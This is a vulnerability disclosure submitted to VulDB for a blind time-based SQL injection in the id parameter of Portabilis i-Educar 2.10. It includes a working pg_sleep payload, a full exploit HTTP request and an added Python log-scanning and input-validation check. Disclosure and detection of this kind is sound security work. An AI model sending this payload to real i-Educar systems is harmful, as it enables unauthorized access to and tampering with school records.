Submission #657688: Portabilis i-Educar 2.10 SQL Injection (Info)

Title: Portabilis i-Educar 2.10 SQL Injection

Description:

SQL Injection (Blind Time-Based) Vulnerability in id Parameter on module/ComponenteCurricular/view Endpoint

Summary

A SQL Injection vulnerability was identified in the /module/ComponenteCurricular/view endpoint of the i-Educar application, specifically in the id parameter. This vulnerability allows attackers to execute arbitrary SQL commands on the backend database, potentially compromising the confidentiality, integrity, and availability of application data.

Details

Vulnerable Endpoint: /module/ComponenteCurricular/view
Parameter: id

The application fails to properly validate and sanitize user input in the id parameter. As a result, attackers can inject crafted SQL payloads that are executed directly by the database. This could allow database enumeration, data exfiltration, modification, or denial of service via time-based delays.

PoC

Step by step:

1. Access the endpoint /intranet/educar_componente_curricular_lst.php and choose (click on) any register. For this example the "Ensino Religioso" register was chosen, which has id = 8.
2. In the vulnerable endpoint, the payload must be inserted after the id number (e.g. "id=8payload").

image 1: https://github.com/KarinaGante/KG-Sec/raw/main/CVEs/images/SQLi14.png
image 2: https://github.com/KarinaGante/KG-Sec/raw/main/CVEs/images/SQLi15.png

Payload:
%27%20AND%206606=(SELECT%206606%20FROM%20PG_SLEEP(5))%20AND%20%27QDaZ%27=%27QDaZ

Decoded Payload:
' AND 6606=(SELECT 6606 FROM PG_SLEEP(5)) AND 'QDaZ'='QDaZ

This payload triggers a 5-second delay in the server response, demonstrating that the parameter is vulnerable to blind time-based SQL injection.

Example Request:

GET /module/ComponenteCurricular/view?id=8%27%20AND%206606=(SELECT%206606%20FROM%20PG_SLEEP(5))%20AND%20%27QDaZ%27=%27QDaZ HTTP/1.1
Host: localhost:8086
sec-ch-ua: "Not)A;Brand";v="8", "Chromium";v="138"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Accept-Language: pt-BR,pt;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/x.x.x.x Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Cookie: i_educar_session=bnTu3HZ4Jk5a0JxRERNMd03ZAr1TUGvXZTDs9DdE
Connection: keep-alive

Normal Request:
image 3: https://github.com/KarinaGante/KG-Sec/raw/main/CVEs/images/SQLi16.png

SQLi Request:
image 4: https://github.com/KarinaGante/KG-Sec/raw/main/CVEs/images/SQLi17.png

Observe the increased server response time, confirming that the injected SQL command was executed.

Impact

- Unauthorized data access: reading sensitive information such as credentials, personal data, or configuration details.
- Database enumeration: extracting database schema, table, and column details.
- Data manipulation: adding, modifying, or deleting database records.
- Denial of Service (DoS): using time-based queries to impact system availability.
- Potential escalation to RCE: if combined with other vulnerabilities and specific database features.

Finder

Discovered by Karina Gante.
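Added example, not part of the advisory or of the i-Educar code base: a Python script that applies the allow-list check the id parameter should receive before any query is built (digits only, which rejects the quote-prefixed payload above) and runs that same check over constructed access-log lines to flag requests to this endpoint whose id is not numeric, labelling the pg_sleep probe separately. The combined log format, the sample lines and the client address are assumptions.

```python
import re
from typing import Optional
from urllib.parse import parse_qsl, urlsplit

# Endpoint and parameter named in the advisory.
VULN_PATH = "/module/ComponenteCurricular/view"
# A curricular-component id is a numeric key, so anything beyond bare digits is rejected.
INT_ID = re.compile(r"\d+")
# Marker of the time-based probe used in the PoC (PostgreSQL pg_sleep); only used to label findings.
TIME_BASED = re.compile(r"pg_sleep\s*\(", re.IGNORECASE)
# Request target inside a combined-format access log line (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def is_valid_component_id(value: str) -> bool:
    """Allow-list check the endpoint should apply to id before building any SQL."""
    return INT_ID.fullmatch(value) is not None

def classify_request(target: str) -> Optional[dict]:
    """Inspect one request target; return a finding for a malformed id on the vulnerable path."""
    parts = urlsplit(target)
    if parts.path != VULN_PATH:
        return None
    # parse_qsl percent-decodes values and splits each pair on the first '=' only,
    # so an injected '=' inside the value stays part of the value.
    params = dict(parse_qsl(parts.query, keep_blank_values=True))
    raw_id = params.get("id", "")
    if is_valid_component_id(raw_id):
        return None
    return {"id_value": raw_id, "time_based": bool(TIME_BASED.search(raw_id))}

def scan_log(lines) -> list:
    """Run classify_request over access-log lines and collect the findings in order."""
    findings = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if m:
            finding = classify_request(m.group(1))
            if finding:
                findings.append(finding)
    return findings

# Constructed sample log: a normal lookup, the PoC payload from the advisory, a malformed id, an unrelated path.
SAMPLE_LOG = [
    '10.0.0.5 - - [18/Sep/2025:01:52:00 +0000] "GET /module/ComponenteCurricular/view?id=8 HTTP/1.1" 200 5120',
    '10.0.0.5 - - [18/Sep/2025:01:52:07 +0000] "GET /module/ComponenteCurricular/view?id=8%27%20AND%206606=(SELECT%206606%20FROM%20PG_SLEEP(5))%20AND%20%27QDaZ%27=%27QDaZ HTTP/1.1" 200 5120',
    '10.0.0.5 - - [18/Sep/2025:01:52:30 +0000] "GET /module/ComponenteCurricular/view?id=8abc HTTP/1.1" 200 5120',
    '10.0.0.5 - - [18/Sep/2025:01:53:00 +0000] "GET /intranet/educar_componente_curricular_lst.php HTTP/1.1" 200 9000',
]

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

Run against the constructed log it reports two findings: the pg_sleep payload (time_based True) and the plain malformed id (time_based False), while the normal lookup and the unrelated path produce nothing.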
Source: https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/i-Educar/26.md
User: karinagante (UID 88113)
Submitted: 2025-09-18 01:52 AM (9 months ago)
Moderation: 2025-09-22 07:35 AM (4 days later)
Status: Accepted
VulDB Entry: 325207 [Portabilis i-Educar up to 2.10 view id sql injection]
Points: 20
